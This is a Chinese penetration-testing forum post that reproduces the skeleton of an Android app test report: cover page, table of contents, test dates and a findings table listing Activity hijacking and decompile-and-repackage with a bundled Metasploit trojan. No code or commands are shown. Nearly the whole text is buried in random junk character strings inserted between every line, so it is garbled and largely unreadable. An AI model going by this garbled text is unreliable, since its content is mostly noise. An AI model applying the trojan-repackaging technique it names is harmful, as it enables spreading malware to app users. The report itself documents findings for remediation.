找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 5373|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
; z5 R) M' Q1 L9 u# L! h" n! G ( c6 J" I* J% K. {$ J9 R

1 A- F- p- Z% G6 G) d# C 3 O* a9 v3 T, z
, v- j3 N3 a7 g0 L* k& |( v; z$ ]9 J5 {

" D5 d! N' I; }- `4 h# e2 Y" @5 W2 z" i5 I4 O
; p2 @' y+ ]# s' H( u. }0 f, x }- m7 G+ u2 T8 K% H

3 f. @1 W# X8 n& G! ^* @! q+ H: M4 S7 J# h$ A 文档编号:                ; ^, C' w: Z" _8 u + j% ?4 \: k* b+ w! A, U4 }7 f+ C; j7 Y

6 U: n/ ^$ q" \ 3 p$ ^+ d2 Q! p% x7 P

l. Y0 f( ^7 ]( c# H 6 N" U2 I4 I$ \# @" W4 W# j   . F+ W, g; i2 o& V( H * W6 D; `% [& @: R

0 k# T {% e1 j. h1 [5 F; Z: U [, k ' y! Q1 c5 o) w3 B

4 F8 O: R6 V( W0 z4 t3 ~9 J; v 6 Z7 {8 y, t0 l! E* W1 |   ) \( ^ x- _) M. l4 v) L6 x7 ~* A4 j8 l7 [

& @5 W; ?% l0 O) J" [ 5 t9 D. l. ]4 r

. N6 t- c- `/ F+ Z$ F7 q& e" p 6 O) H# B) b0 t! e; f/ k8 _' N   6 l" R* ~8 x1 v+ L 3 V2 x" {2 l4 |* V. e" I

5 f p$ n0 B4 Y1 U. s7 b ; @% h/ |/ x/ ^

; Z4 X+ I) x% t* b; Q$ \ h: E6 `! R7 y ^$ i. D6 w   " m: z) N0 Z, W, p& J : x' _; W7 Q# u4 Y! ?

6 W( Y- Y! }8 `- U ; D% K: a6 l0 b3 y T2 y- o; O6 P

$ R! _( Q+ _9 n( [ 7 V. g0 e8 U3 i   ! s% ^% w: S% l7 j4 I . l! l2 F7 ?! k+ w2 e

) z! d f: U1 m' M/ ]8 t# A; L; X & s. l2 M" [% }- F7 p9 L, f5 x) E

2 _; q) F# c2 c6 M. z 7 k/ I/ P2 Y8 S y' R 某某某APP渗透测试 2 E8 ~1 |& N4 `6 F 8 Y! ]7 E9 V* p( J% Z; s

! x. M- V% ?: [ a7 z4 { $ \0 ^# L# O" w" O5 G9 y

; l! ~% H1 }0 { ( u1 {1 v# I7 E2 S/ k) z# e   3 M1 Z, B& h% K f4 { V- b6 J* s8 S" d

$ h9 S: r7 I$ ~3 G* H& Z 2 a! B5 S3 d& i' e

$ u& O8 i7 Z6 z( F6 D / h, S8 l: [1 i$ V& u, h9 I/ T; `/ v   * T% t7 r# h4 ~" D % q7 B2 X* c' x% b7 N+ ~1 j

$ G/ D9 ]8 k" b4 U , l0 |' O, y y. W

3 l% n; @0 N. ]0 ?# \! X- A& E O( t0 a. L1 Y5 z   # v- d! J6 o: Y , \0 I( V6 l! e9 ^6 ^- U

8 x9 N2 L4 y% F) Z - E! b# T2 w% z/ I9 C

, a+ C( o4 J( X& f- h9 N7 _ " \7 r3 s& [. `# e9 c# i; N! O* c   % G! |8 S9 f* V7 k5 B( \ 2 I" @0 _0 h' r+ B2 V

$ t3 P! V# u" v+ a 8 ^. I! _: \ p! o

9 U( j% _ M& U# `% _) ~: F# w/ [# } 技 术 报 告 ) T1 l# N/ ?4 |) v5 D9 B' I ) w# o9 f5 S. T

. k& u9 K( a1 p 6 c: H5 B# h/ J9 w( ]9 G

) N- Z9 c, J7 _5 F. }+ i8 x 9 _" D3 P3 O& B8 h; }7 U# U, I   5 ]2 _6 G3 _6 G, o3 Q5 f 4 G% @3 K5 a9 z, A/ X+ C0 w

: W9 {6 R3 h$ t- v* L" Z* h0 V $ c& g; [; u" T' _' C6 i

4 `& O4 T, q \ ! |4 G5 {' [4 h1 g% I   4 o2 E- }1 r& \- t: n , _9 v% L# N( b9 n5 `

& l: e7 n. I. B% ?4 D) ? / x; G: `' a( ~+ N. [

& u& s' V1 [8 A6 y6 c ! V g+ b5 v. Z [' E# U2 x) F( Q, E   * @ m4 K7 l) p: ^; Z+ P 9 k. m+ e0 G# f0 U( X8 S

: B1 E ]9 M3 \ & ` F! S+ k1 i8 B+ @8 c6 |

* m4 H4 ?( H/ y$ j, z! _. a" k7 b6 u: ?4 V2 w" Z3 O' j) E- u/ P0 c   " b% a: \. c! J8 v* ?( {& F; T7 x. B* k& P* f4 ]6 [/ L

. s7 a! `3 i' o. e" t6 \4 P* v0 Q% R6 g9 S

6 U* x9 r/ z. ~( r& @: b ' ^5 r( x* \2 {" a( t* W1 O   8 s+ \* V, z( `: Q7 |6 [# ^4 P " U2 O M8 n6 V3 F' }+ a, n) v5 p [

6 w1 {0 u% L. u6 F6 W. P 7 q$ O/ [1 u7 {6 O$ C

, B0 {( z/ g, R, }. e' P% G- p8 X6 l8 ~3 ?1 Q; C a   6 I; X- U! l, V# \ 3 b- K# r' W% I% ?9 {, @

# b/ _$ m$ `4 o4 v, H u. \0 Q1 y1 f' N: l) i1 e

8 b- @4 I% k: v/ r: `1 d! D9 e! M+ t( r1 n% F   ' T2 q# f- X* H1 ` V2 A. Q * o: q: E' x A7 y2 M! R

6 {4 p6 K% y' O1 o. J+ g- I; w0 L. F+ p# q. z( c, r! H

1 | o6 [, M$ ]/ I3 ^4 I! @ " y0 f I; N, G' h   $ R+ u- w6 {* O$ U w' ~# X' I% ]/ n! {/ H

- h" }- C7 y5 v$ q! Q" v & J9 b; x8 j6 I3 Q" F& N" o

7 T% H7 [8 A) }8 ^1 \% l% R! I7 w- { # U7 R/ [: l6 U/ f2 m3 w   4 |! Y R; m5 ?+ z % d& R; i6 q6 j' P1 }7 U5 i- V& |

/ i" \4 B" g: s6 ^ / `# c7 }6 r* }9 O9 ]

- E0 Y6 a* x* j/ E e , i( b0 @# ]# X+ _ j   ; O) I4 V1 v3 I0 H1 a 6 p. U6 I. K5 v

" h( M: K f' X+ z4 B 1 e6 [! P4 F; D4 |% x, b6 U+ z

0 x. `) e9 U# Y7 M, Z- Q 1 y5 \% Y3 k( V' p" E   : Z/ ]" J8 b/ b5 E K" K% b. n1 v* c3 l4 r

2 z& y$ l- J( o/ c% K' C! k! k 7 Y/ \ Q2 v7 H# ^! [% z% ]; s6 ~

: {/ O9 \2 F- |! |+ m " }$ u* E- j; `/ |0 W   ) ]) M1 c U; _, v7 G, P% D0 g7 o/ A/ x" S$ |+ C

1 q1 o; z$ t) G) v f' s1 I# y1 Z - l$ n! \2 v& E s

1 O2 B3 L+ w, x3 s / B+ |0 S- p5 y9 N }. i/ l9 G1 b5 P   1 s' V( d* B% x/ r3 Q 1 E: [2 ^3 w& l

. N" |& @$ Z8 a1 Q# E& c# U : [8 B( T3 r5 l, T

' ^" P5 q. d5 G4 u5 L: l % G G6 |! D- c. k   7 X4 H' W, y* ]( t 9 K+ E) g0 ^: |

1 o/ n) g' m+ B: p9 L & X9 p* @+ n2 z) n, k# O _

9 B& b ^) @, K# c7 k# g5 ~ * i+ [3 @2 z% m( u: S: A   % t0 x1 t% a6 M# X k. A3 z& z5 y! d s8 b( z+ a1 n! I5 g& W, l

" t9 ~' x7 _8 {# d1 T }+ } \/ h4 A1 q . v* ~' E8 V$ J1 J3 C) Z1 o

% Z* a9 b7 k/ K+ z3 n' y " _& l d6 `' S3 B& z1 M   / N) V2 o3 s; J9 }. d* o& D7 w" A, @ , W* X( I% R8 P, ~/ C) W$ _. T

4 a- T+ L* z3 y, ^. t& O1 f) x6 | 9 [; h5 p0 w' g5 W/ C8 f6 T

- k: f4 J g7 e4 T& q! x" W7 M ! C( ]& i0 _, ^   1 R* @8 a7 W" s1 P5 T* q* J& G6 k( i G# c

- A. [8 w% y' ^- P3 K# @* ] 9 P3 [1 j9 H R @& G

5 U! H# ~3 i/ c. V/ \% W- M% c* Q/ w |+ B6 y3 D; l- i. y   8 c- k' t, I- p9 S# S8 z( O: `. [- r ! b$ R1 X' K5 |" \8 |

5 a$ Z! P4 _5 [- U0 X* Z ; s1 `( [4 o+ G+ z

# N- a3 |% U' {& n6 o/ K # G5 ?/ E7 s& `2 h 二〇二〇年 2 ~: w+ m5 q& h1 a % Y- y( J5 a% S/ n

9 \! X& b6 n V& v' C! z+ W( V) s+ R) e8 [$ p/ i
9 c7 i9 l8 t2 N7 E* [: p" z+ |2 @1 v2 I8 B6 n8 e1 l7 y0 j
b0 [* c5 j+ F0 o & p v& `+ x6 c; M " M/ F% ~9 D- [9 x/ w 0 O3 J8 [- d. s9 f/ }
' E& h9 Z0 u u3 s7 v! g; L7 O" }! A6 }) v" U! ^' A
1 x/ H, L5 b4 J% j 5 t# {' y( ?2 J. }: U* M V! ^) e. T
% v% \( ]4 v+ T6 |* M2 Y! f7 | 0 J2 ~& H) o/ w# {7 g/ k ) x! [! s2 w, x/ m% d / ?. `" Y% s5 k. F! c8 o3 v
: J4 V' m7 C/ q( r" v6 `/ p: I* n) w$ o5 }

4 X6 E1 @6 \$ ?) S$ k3 K4 x w 5 a, I2 c; w3 h' x. a# f2 y$ v 目 录 - b- H9 P1 N5 J7 T5 J( o % F+ k {7 f. R$ u+ H- L

3 h! }! d ~) Q' p: [0 e* j 7 w5 l$ w8 I. u$ _, V8 r' H & w0 l3 p( h$ z. x" v ( \* a. M, V4 w5 ^' T

% W/ `6 E% D9 H) o M 0 H3 L' Y+ l: V% g; p   6 R. h+ C! k8 Y/ s4 S( V& B - `( c- s5 i2 E" U' X

( e# H* O. ]- v+ M) m. c, m% l 7 V2 v3 F( x0 y4 t

" Z' o4 c8 |+ r3 i" h" i1 U * k' j U* N) @2 L" j 1 概述... 3 5 T* i# p1 S! d% `& | ( I! b5 G; F2 n7 x0 I% s

) E. J9 e" Q9 I, w4 r q - r- Q# K. B+ t5 R: ]8 L

) Q }. v5 u# _6 G9 U1 b R ( }/ A9 Z! A, @$ v1 _ 1.2测试时间... 3 O% B k! \" M/ \/ v0 C ) J) B$ K0 Q2 S8 g

( w! {1 ^( X' ?$ s4 g , d0 _9 p8 b6 S) C1 U

2 Z2 T$ d% V: z2 E: x! x$ H+ R: ~- B& `% o2 R. _. p/ j3 b 1.3测试对象... 3 : }$ ^- C8 z8 A, y & g1 a$ R; F. L$ t6 p

. M& Z$ C, [) `# C' Y% ` 5 M4 v D! I S

) p0 D' K4 |( y8 [9 [. | ) x7 R) b$ ]" q/ ` 1.4测试结果... 3 $ F1 V w/ A; q% m* p: A3 S/ q% a7 `; M* m

1 _( D8 S6 o/ j- S3 k0 d % T$ F+ a* A5 c8 k8 G D

9 m2 I, }0 e8 n8 \/ g8 c' @' V6 }( g; x# G, F; I6 F; C 2 检测结果... 4 8 K8 \/ S; H1 E+ Q$ j0 i3 [5 n+ t ! O* t/ M" i2 _( B3 T/ y

1 r) T m/ y* F5 s! ^) z- q2 z9 L) d8 e0 L

- z9 U, @9 v' H7 L i# S 0 x3 \8 @' g5 O- l, @ 2.1 某某某... 4 , v0 i3 K# t( s; A4 ?# B( @ ) N3 \* B+ A1 [

; H& j# T. A6 H1 b+ U7 D3 D3 g* B4 m5 B4 W3 w# s9 S5 |

$ }9 d8 a" k; W5 z 4 |' H0 S( J; ?6 ]6 V 2.1.1检测目标... 4 8 Z: W, F; X3 ` n" V! Y$ H 4 c( s* `* O. o' q

: v$ ~) ~+ I$ w7 y- u( G6 K . a/ O+ Y8 b( }( S0 |* `

2 s8 L8 U( u# g5 q$ j ' W( `7 N( c( C( R. I `6 i, C 2.1.2检测结果... 4 L) d9 y$ z9 l' X+ Y# _: u # L/ l4 S8 L; l1 G

7 {$ g" t& e; e" u3 E# J' r) E % U% g0 x, V& w' \/ |3 v: F

+ ^) X ^1 e. ~& H7 E* P 3 Q0 l9 l3 x. p- P- H 2.1.2.1. 4 6 k0 c" V" K# J2 q- p2 }- B/ x# ?% V6 d( Z1 }- Q

9 v2 j4 x2 N: j w; A3 \- g+ I e9 O" W

0 L. S" S, h( U2 U1 K' f f, p* W i; e: n7 L3 n8 H: l 2.1.2.2. 6 0 P- X6 L4 v6 N' @ 9 T/ v4 O8 z( m) ~

# N, u$ P( m( P; t4 |) M7 P6 {3 ^( W + |5 m$ C8 n7 B7 G2 i* F" ^

0 K: o$ N% u6 V1 o# l% G " [- V* |) q5 m& s( J# ~ 7 J% d+ c4 o. _0 X0 i5 P0 V1 S # f9 t" q2 ]. c R

$ L$ O1 G4 D# z , s+ g1 ], k# L# M! ], \( D, j5 R7 F+ V$ N$ H' [, l8 \9 Q- X % }' h; M& H; D+ y9 |
6 [" q4 ~- T2 \* [1 X( ^/ t " F4 t6 |: U8 U2 |1 u4 i- u m
# z. n6 t [3 K/ P9 g 0 F! @. @% F, R4 H 9 e9 r2 P" [0 @ 9 f( u- g% h/ E- D* o1 H

8 F* s4 q) ?) u* a% W0 m9 D& Y5 H4 k3 e8 `( j 1 概述 5 ~ x; V% c4 P2 V; E1 q8 h ( H4 B0 z7 V2 b& Q

0 B. f2 `. n1 f+ O& P1 ?* ^ 7 X% @& |3 X3 L$ l# g9 b

( L" v% |" V0 r3 ]3 I+ ^: s! c7 N$ Z7 J' t5 Q 1.2测试时间 1 \8 ]# ^# X0 \3 n7 O. U, q$ o " \) h9 l' r) s! f) o6 O' o

; _- R* B/ T8 U8 U: r: @% [) f" u " T4 H3 n6 t# k9 p 6 W; @' V" W( @1 b L r# q4 \& Y9 h& k" `8 V, g: R+ ^3 ^" k E# D7 @0 G7 A; \( {& ?9 [/ I& D o+ b, G9 V+ F% o# K% y2 m0 r' Z4 {1 N) F" u0 m) S' q1 T; U: v. y1 f1 J0 c# t! M$ \! Z5 r; }# |9 P o( Y4 w1 w* W5 T2 f& v( R6 |* q' ^4 V9 Z( m4 N/ O0 ~" ]) v, w0 ?4 g( p m2 [! P) B% Z- i- r, S% z5 B) C# {3 m N1 c r$ p4 j6 {; T: E6 A) c+ o0 N' k- K1 _( |, ?6 l3 m' @( c; } E O1 k/ n r! w* A! r% D/ _5 ]- N4 V7 f& R% j/ ^% \ W' j6 U+ s, `2 v- I, ~, L/ q8 b/ P' S" h0 S2 d- C; f( A9 h9 A$ v2 A" W+ S! p# ]5 [2 n" {9 V5 u! h4 B& v' w) p* P' d& Z9 G7 Y) T% k( v. H: C1 m6 e" J6 b/ K( V* q8 u) D0 Q, Z+ x, V2 i8 h2 ^7 ]1 t8 F4 o S* R6 q" b! y2 u8 P2 @3 e' I1 i' |0 N. P9 c5 f5 [* E
. p) D1 m2 B$ c+ x+ m# d, ^6 x 6 Z, p0 c: h9 m

, y) X4 n# o3 q+ y% q& i* u3 N1 b3 M 渗透测试时间 1 M* i( d' V. `2 g" f# T4 N8 d' j1 j. |$ s; n l% @+ v

0 l( U6 f, L0 ~ - Y. Q& i' L# Q4 W/ G) |
4 A( A5 t; L. [: n , f% i) I2 B6 D2 `; x

* K/ Z% K, p7 u: v( m% T1 @% Q . c5 V( l. S2 a& V# h 起始时间 ; V( f) e- t5 t% h4 ]5 u $ T6 ]: m! D1 o- W* O5 s

& ^0 c: S# j' f 4 X3 o& g' G" E- T, M 		6 A9 x" c$ |; J; I - h" Q i- w2 |; S1 R

+ ~& [4 @" a/ s * s4 {, D; x. _2 N7 j9 D- {$ h 202046 ; ^; k$ Y+ E1 L2 ~, m2 F- ?9 y' n. o( t ~! u9 l9 c, X( s

2 J; i: D* Q* T( n# D $ X/ E$ d+ a* p9 X ?# M$ {- Z+ U. l
" q+ {+ ]/ ]9 {/ r! a4 L: I* o1 d' m, U3 p( C2 H) L

; w# ?" G' D; t 3 D+ r6 m$ E k0 v( H/ R4 G 结束时间 8 R6 z! ?/ J F |: t+ L # S* c! i4 r5 v4 d+ o+ F+ m4 B

, J( A3 u F) ?. f . B' D' k- t3 E' q& ? M9 k, u/ w 		$ [4 }8 n) q5 ]7 Y 9 a2 Z" U! r9 g$ J

# R0 Y* f* w' y) d 7 Z3 u" R. d r2 {) J; o 202049 # C2 Q4 Z) T c# u' u4 n1 `4 s; b5 E) {$ P+ d

, Q c( X f$ ~* r 9 Q' o7 c% _/ D5 m8 g1 e
! ^, E0 H6 x$ b) ?6 [; I7 Y; A ( S$ D( [1 ^- y' z% p0 t* g2 X/ S+ y

( G' H n4 X% Z4 G2 d; q . |! B; ]( o( f( n 1.3测试对象 ) Z1 V, X/ x C; p 8 @& G3 z( a2 K' a

* F" B% |, s- @7 j( k& G! m% |, h2 q8 G$ L0 J! N! r ^9 p+ f

' F- y2 y2 T5 r3 ~2 v7 |6 H / I2 @3 e! h1 W/ m; f3 V! N8 N: k, o 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 6 x, n( J) p+ {4 [$ k- s( [) w& x1 B& b8 R2 E1 d, b5 p' j

" _% t# e. w- {9 @$ d- z8 P9 d J1 \- n u+ `: q# c* {) x

]9 K: K$ g6 D* r9 W + C) h( e H8 J+ N" b 1-1 检测对象 * M( a# o; i7 d7 y/ p 0 C( O) X; R( }5 I7 `2 x! w

) M! h ]2 z: o* O. b6 S! h& I }) M4 r, h + T/ b& r% x6 F3 x$ n8 R% x; y' u) {1 I2 r' }0 D9 p9 }& _1 P. u8 E+ | R( p9 y: @, v8 L' [2 H' V! ^. q0 G) | Z' o# r9 k" e/ i3 w3 Q. b1 q# }! h1 n$ a! |- o4 `* u3 @6 ~' Y+ I% H' Z" ~7 H" U/ s# t% z9 G# S& y# k! J) R& P" b3 x& @, ?+ |0 w: E8 u* k( r6 a) A' C; }$ r# Y3 K5 s7 Y& \4 D$ a* O2 C! o; z6 E! [. A2 ]* ]# [+ `* G1 C- i( P8 {) `; @* W# b3 M H x" n: V7 [. }2 k u4 i: P7 m' X& _$ P$ b3 R4 o1 }. n, b, D6 B! h3 T" e; B6 g6 L0 H$ u& H1 u" [. h% a0 |4 Y& C N9 q3 _' }- s2 j" F2 X& l5 w$ b+ Y. e0 c+ P( O5 U( X& z0 b# _- @. `1 r/ N, k- C$ o6 N6 g; I5 V, z# ]* u; S) u5 o# `5 V* o# z8 g- k1 O. f) z/ ^" m3 o' i0 Y# R, }1 i, i3 E9 Z8 F3 t* F4 i4 Y4 S+ ?5 e# O6 T5 Y/ p" `, m1 H# ]) M; p% |7 c s7 K: J. j2 e
: S) z5 N4 _$ ^3 U& e! M0 }1 G/ r) Z3 A, W* S% K1 q

* J# I7 w+ v; Y6 J t0 ~ : I) l2 T$ {! E1 J9 J7 @$ b5 v+ p 序号 : i& `1 ?$ E+ |; w2 \" [ : s8 r+ E. f! p9 G5 U' A. G

* i! D% D6 z" g) w5 I ]( M/ |7 u5 {# B 		- T2 F3 T0 J! l1 f t- B C& y N9 p" e: t

6 A! L* i! S1 f/ e2 ~ ) T* |& I, Z2 u# z- O) A! z 测试对象 % j) J9 `! K9 P2 T: [4 E+ k$ W # y) N) G% w( K4 n6 e* _3 T7 e

; G* D3 {) z, e% `. b6 P# v% W) J 		: Z. P" j% h, I/ `- `" M o + ?' _# V3 O' d8 H+ B

: @1 F1 b0 C3 r+ @, f$ q2 e) a( B q 测试地址 + x$ U+ ^: T; c; t @( t/ y9 S 4 b7 N5 g( |6 D7 k% K4 I$ h+ D

/ X3 S- H3 t- B N8 M' K7 U) Z8 T; g) X D. I8 {- m: V! j 		, c# V# O; \$ n" n" H V0 V7 h4 `0 ]( U, t, B$ r% m% c

|% T5 @: o9 [' R a% ~5 F9 ^" R; c 安全漏洞 / [! N2 C6 P. D) S1 u5 e+ T3 s4 X " U6 A9 f) Z7 J: m7 o5 v% P1 V7 f1 a

& W9 C' I& K1 `: Z* U$ r* U; n# e 3 x) I& O, Q/ q/ y5 t& D1 O" }
& L& A( t- X+ B0 b, f8 K* y! Y 6 F' b5 j7 X$ S' H9 k

' E& i# ^; s6 F' E( o% R! L : e6 q' ?1 B4 u' t 1 ) Y# A9 n: c! k+ f0 M$ ~( ^ 3 W9 K/ J+ }( {5 X1 w8 `" ~6 v

1 T5 \ M8 U% O3 \' m" z; m; i3 A 4 I* }- F$ _ {$ u- z 		' C6 d% @3 q4 F5 d, t8 k ' w! d3 U, B3 r; x# w: q

' N, h* ?! S8 f; {0 f . b* v5 c' Q C; u: j 某某某安卓APP $ T6 R7 {2 o9 @9 ^# W8 j) S$ [, E5 f6 l4 D4 U# [) a# _

5 k0 H7 |: i5 F- v. t 0 z# m, k* {- y$ j' T# E0 E+ @ 		) ]) q) u. f# T! a) { ; L5 P7 n" T( `+ p# L

( _; p- m4 H; E3 _) o8 \" f5 u ; J, s; a0 n/ s) {$ N, ?" M   ; l/ ~8 _6 {" Y$ U1 q/ } 4 [" D4 `% i/ I% Z' i% Z% Y

# y* ~1 }: G$ y 3 W: m6 |* M) h. H, i- `) Y3 z( }, u 		* q1 K6 h8 ^/ K & }2 B, L/ K+ ?1 Y; s/ k

7 x- P* k) Y2 P6 u0 r, b; P$ z ( Y V! K* g% B" B 2 4 t6 d, y) Y" U2 r* S* L ^$ Y9 C7 T- T6 [. h# D0 ^+ Y

9 u* B1 F' W9 e; y; Z! k3 ?- n " K6 | R: |& Q3 }
6 |7 k3 ]5 N5 @! M5 N: b1 D$ X% G; O& _) a! K4 W9 R- w3 p& q, G: B3 f

: W1 u, N; k3 G* G0 g* u 8 Z8 F0 A, X- _* J 1.4测试结果 1 V b. M. s! T4 w$ z: M4 M2 M1 y: n& f/ |& T8 y _4 ^

7 W: V0 S L6 w& G4 N! e 2 y& P( z" A2 l7 V# m( I

% i+ w' G; K3 w% V% K ) @% v6 p! r: `2 T* p 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 N4 \0 h) \, k& S 2 ^' e6 P% t: h0 Z Z% {. l k

( P5 e F! r* H5 {1 D1 y 5 p" Q: O% n. _! }6 c7 p

. S5 h+ d6 C' ~2 |" C" d/ R! n6 y8 E( z; G% R9 z   5 M8 `$ K0 a+ s9 y+ J; {* | ( c) `5 d# @# @

* E* _4 h2 h3 b- A ! ], |$ A7 g5 z5 i: p2 U
6 `0 U. @% p* `& m O. L& U2 r' H7 k 8 Y, g+ n# `3 K _$ n ! d9 j8 P; E, ^2 |# I6 ~7 @$ N2 ]6 l4 m9 s! }: I( N8 e' D) Y) p/ e+ t; u' s5 T. p4 u, N4 D- b, e' H% X, r: p0 Y, G2 v* C2 R3 e4 N: S6 F' j2 _+ X" `& } w+ {1 S5 F! @; W2 \; h3 W" U" n. j+ r7 U) s, v+ ^2 H: c2 f9 j, P$ J+ \' u8 I; i. Y" D0 t" M% F, B* ~3 ~; K% G3 Y$ V$ q4 I- i! Y: P$ j4 h+ d+ h5 \7 L- E z4 h1 y3 d1 V0 r* D) g, l+ x! n* w4 w# g, s) B$ ?, }- }' J7 U, t. ~" U, _' O/ T" u U4 a! |" I* B! W7 ~3 E+ m9 q# o6 y4 a4 n( r3 J& ^# ]! l; c) \5 |% I, b# I* _, K0 O3 i' F0 x6 i! m* k0 d7 D( t. c1 x. R# q) X- K( u' t# s* I% L' T% h2 B, B1 m' y+ y: t0 O9 d A: S6 q2 f4 o: w% E8 b0 o d2 d$ Z- s# n2 p( c4 M1 ]$ i5 G2 {! }- t/ ^3 t6 K" x& b3 O7 D) d$ R0 L# t9 ?8 p, D9 d$ `' n' |' }: V6 O& ^% F7 i. U4 y. p) s( h; e! p7 d. x2 W2 N$ R3 {6 { E- H2 X8 ]1 d% s+ d7 V' l/ @: r+ W& \ s0 u9 I4 I! G5 { G' X5 {; M3 n4 f5 H. S B I7 |7 C# K2 M+ n- Z3 `" S) P& T) G/ l9 A7 @+ l" W' ] r' V( O; p( z7 ~! q. N( f k+ i" b1 Q$ \! n" m5 K: K1 x7 E C; X- {; q9 ^7 ]' ]% Y- p7 a. `4 a1 S- k* R% s4 v2 K4 [' l: g S8 f# h( U- R4 k+ Z" o: n5 B' n8 @8 U$ q; N) a) Y' ]4 n) e4 t, u9 W! J+ l2 k8 e; N/ t9 l( a& ]% n
t6 k; P: U0 u# a$ x# r 6 H: a# _9 D) N7 G3 R2 F

' ]. Y$ B0 X+ {; Y) \" M3 n6 R4 t8 m O1 Z" m4 g$ c 序号 $ P# ? _! J6 a) s/ d9 {5 R) Y9 k& @* t. W: c- L% C

* I! k' { o4 y ! {. _+ ~& m u1 S( q1 J1 w 		* j: U/ q1 }4 N% L; J# E7 N 4 k+ Q! T s6 \* W

2 {8 y% K/ }1 M 9 l+ T2 J2 Z9 {7 {2 J9 P 系统名称 ( K% U" k& d4 [0 M0 a) Q+ p( e* q1 M# P! _& p7 C

; |, M; W1 ` v, I* A+ d* v9 a& |" l7 i/ O' F# Z5 _( Q 		# m! O: x$ F9 V( ]0 s# o $ h$ i' \4 T/ \& L& q4 }: O# Z# k

. F7 l+ t5 V" h( [" f+ k4 ? . U/ m3 I) h* D( `" h 漏洞名称 - y9 f2 Z4 g9 _9 ` 0 f5 N6 c9 i, [. k$ @

{- [6 B! a9 W) _9 z: ]6 J # A+ ]" o# A; m& W$ W 		) T. `9 }5 q% S / a V8 z; z3 P9 e a8 F

3 t0 _3 J7 X2 A2 o& G2 L- r # u% s& W9 H; F, @ 漏洞危害 " m4 v) y0 @* g) v" w - l# \) ~$ F# d

! `- @4 Y t3 `6 @ 7 ~' r8 c4 w- I) v* ^: }/ e' u 		9 [0 ^* p, I* s6 v- u$ Q 6 J o$ V; s& M$ d, t) y4 @

, f; B6 G+ c: Z8 c % \1 Z" T2 _# \: V 修复结果 ' O2 l9 v1 q0 `5 x% i% g8 l& e+ J1 e e# V4 B; _0 ~

) O' E4 F$ _5 n2 d0 L8 b! b" W1 \$ d" I4 R8 b2 [
4 c+ O; k7 a3 B; r5 \4 I * \% O0 V, z( z# \& F

5 Z% `: r& W4 {# f+ i1 ]" g$ w" w6 p0 N3 ^* ` 1 3 B8 {0 }- n$ B 6 |$ Y+ ~4 `. p5 B! L2 J$ h

2 y* Q6 T" l; {) A$ J3 D 3 q' k, ?4 A+ i- q. _5 ?( j! v 		# X0 k0 [. V# i! n ) j* O4 U( t% S

3 ?& _. N; p c 6 ?$ z$ ^) V. M' }* S2 D 某某某某某某APP + u f/ ?6 _9 z) \6 d2 Q7 ? 0 W4 {: y U* S/ U, h4 V

& l4 i4 e1 E% k v% l' A/ V - N$ H0 d, _' A 		5 D# H. V+ g3 m" D) `/ ? 5 b! C+ t0 n1 s0 J7 Q5 p: J

9 H( s2 u& h- d8 _! g, p+ ]" J* K* g 2 _1 ^4 }6 ~- U. b Activity 劫持 ' U0 W7 G2 E; n" Q# {9 g& @$ W( n- q, `6 Z7 K! g5 F6 Q0 x

. w; j* q) _) P* X3 _! D- d5 b. }0 g {7 a. T. i8 z/ h7 I4 M+ W

- o: _( i2 m+ B# X3 `: n& D7 G2 v: e v# _   0 I6 ^3 s% T: K2 u' j4 l& X, X! \1 n3 g

0 Y& E1 Q% B1 Z/ T: k0 ?9 I3 P7 u; g$ t/ p8 s, M+ f 		9 [2 x) H9 N2 f5 y" h0 C 8 l4 P& l8 s4 L1 y: y- h/ d; w: O, h8 i0 G

# z8 R* D5 F3 s( Z% S9 F + {$ L1 Q2 q0 n* ? " n+ r' v# e/ ^# M& J% P ! Q2 \; C6 v3 I# M$ E( [ i

& r8 o3 a* g: S" I7 } : N9 o& z( [+ s* [( t* ^7 [7 j. v1 B 		! o/ o& A) m. n9 W $ r* k4 N# V9 \& |1 h4 ~

* q8 k( ^, G6 i( q/ } 5 z# T# f _) I* k, s! Q: H   & r+ C4 h) ~3 R% X / f1 u& u( h6 P; x" u

( v6 ]# }9 u9 O& o2 `. H1 i9 ~ / x0 W3 Q- z# i( r- E5 r6 ^
4 T) ^) a- D) D; d& `, b$ c0 s; v/ c 9 e1 W! n4 |+ B; b4 s& Z5 v

8 _2 A- H( _5 C# h5 ^' p9 ~7 z$ A. i2 M0 Z, j# N6 j 2 ) h) D. W3 J9 Q$ ]1 @' v 2 e/ G* v t+ S1 G- X

/ g k; O, _* l' Q* J. Z8 \# y7 | 4 I4 g: a$ A* [. Z! _% B 		6 E9 J1 {3 V) T % H' S( E" Y ~, ?, U( i8 f

' k: v) [) R0 D& q2 S$ d 1 K" S5 l" s* z9 _# ~1 U 某某某某某某APP ! `/ m5 `, Y) M$ B1 J9 A 8 Z& e S% y' |# S6 @; n, E" A

' R" V* A% Y w2 z5 ^: G& y , f/ `+ [% x4 ~. @4 K# Y% T 		" Y# c: ]$ ~- R) {/ n& K % M5 _- N8 G. l* l7 e! D

9 K3 G3 m4 f9 r) Q. `/ r C0 i8 r& ?6 V9 H/ y 反编译二次打包捆绑木马、篡改APP代码 ; R. Q( ~# H+ y6 `* p 7 ~) w" ^. C. ]

4 R! \% b" O$ {9 I ; h# K& s3 a+ a { 		) D) v3 I& Z! h3 ^ ; K+ p; G: g% \+ F

. N, a$ R8 v- ~) E c/ Y0 i ; ]# S0 t1 q3 z e1 M& U! V) S9 f5 \: b / Q" r: V4 G" Y' a# m

/ ^2 G7 p# |9 d# ^ # F; Q7 z7 W3 F" g; j 		) Q( `1 m, h3 q" [( D' {7 W6 ?8 \' I6 b- `

! X0 O& y, `# e) z/ F) J% f) m : [0 ~2 @1 _2 t7 N   5 v/ h9 ~ V( h5 c8 B3 F9 v" G 3 u- W) N4 v. S2 S3 A

- k; f; X5 z( U& F: f3 {4 @ 9 B, C7 z2 w" X5 X+ [, h1 ?: B
: y/ d4 b( {- l7 f0 O0 J! b1 @3 L3 O ) [" z) c4 L" X! K
